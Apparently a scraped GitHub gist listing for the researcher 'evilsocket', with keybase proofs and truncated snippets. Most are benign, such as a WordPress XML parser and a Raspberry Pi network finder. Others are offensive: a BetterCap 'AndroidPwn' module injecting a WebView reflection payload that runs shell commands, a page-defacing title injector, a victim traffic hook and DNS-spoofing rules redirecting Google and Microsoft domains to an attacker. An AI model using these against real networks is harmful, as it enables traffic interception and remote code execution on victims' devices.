I hereby claim:
- I am evilsocket on github.
- I am evilsocket (https://keybase.io/evilsocket) on keybase.
- I have a public key whose fingerprint is E242 9918 770E 94AD 9412 BFDC E244 814B C591 3655
To claim this, I am signing this object:
| <?php | |
| $source = 'wp.xml'; | |
| $siteurl = "http://www.evilsocket.net"; | |
| $doc = new DOMDocument(); | |
| $doc->load( $source ); | |
| $items = $doc->getElementsByTagName( "item" ); |
I hereby claim:
To claim this, I am signing this object:
| #!/bin/bash | |
| # | |
| # Periodically scan your network searching for your | |
| # Raspberry Pi board and update your /etc/hosts file | |
| # with its ip address. | |
| # | |
| # Copyleft by Simone 'evilsocket' Margaritelli | |
| # http://www.evilsocket.net | |
| # evilsocket at gmail dot com | |
| # |
| arp = | |
| "? (192.168.1.117) at 00:92:d4:06:01:32 [ether] on enp2s0\n" + | |
| "? (192.168.1.112) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.127) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.122) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.121) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.4) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.3) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.14) at <incomplete> on enp2s0\n" + | |
| "? (192.168.1.13) at <incomplete> on enp2s0\n" + |
| public class WebViewGUI extends Activity { | |
| WebView mWebView; | |
| public void onCreate(Bundle savedInstanceState) { | |
| super.onCreate(savedInstanceState); | |
| mWebView=new WebView(this); | |
| mWebView.getSettings().setJavaScriptEnabled(true); | |
| mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface"); | |
| mWebView.loadUrl("file:///android_asset/www/index.html"); | |
| setContentView(mWebView); | |
| } |
| class AndroidPwn < BetterCap::Proxy::Module | |
| @@command = nil | |
| @@payload = "<script>\n" + | |
| "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" + | |
| "for(i in top) {\n" + | |
| " try {\n" + | |
| " top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" + | |
| " break;\n" + | |
| " }\n" + | |
| "catch(e) {}\n" + |
I hereby claim:
To claim this, I am signing this object:
| class HackTitle < BetterCap::Proxy::HTTP::Module | |
| meta( | |
| 'Name' => 'HackTitle', | |
| 'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.', | |
| 'Version' => '1.0.0', | |
| 'Author' => "Simone 'evilsocket' Margaritelli", | |
| 'License' => 'GPL3' | |
| ) | |
| # called before the request is performed |
| class Example < BetterCap::Proxy::TCP::Module | |
| meta( | |
| 'Name' => 'Example', | |
| 'Description' => 'Example TCP proxy module.', | |
| 'Version' => '1.0.0', | |
| 'Author' => "Simone 'evilsocket' Margaritelli", | |
| 'License' => 'GPL3' | |
| ) | |
| # Received when the victim is sending data to the upstream server. |
| # Empty lines or lines starting with # will be ignored. | |
| # redirect *.google.com to the attacker ip address | |
| local .*google\.com | |
| # redirect *.microsoft.com to 10.10.10.10 | |
| 10.10.10.10 .*microsoft\.com |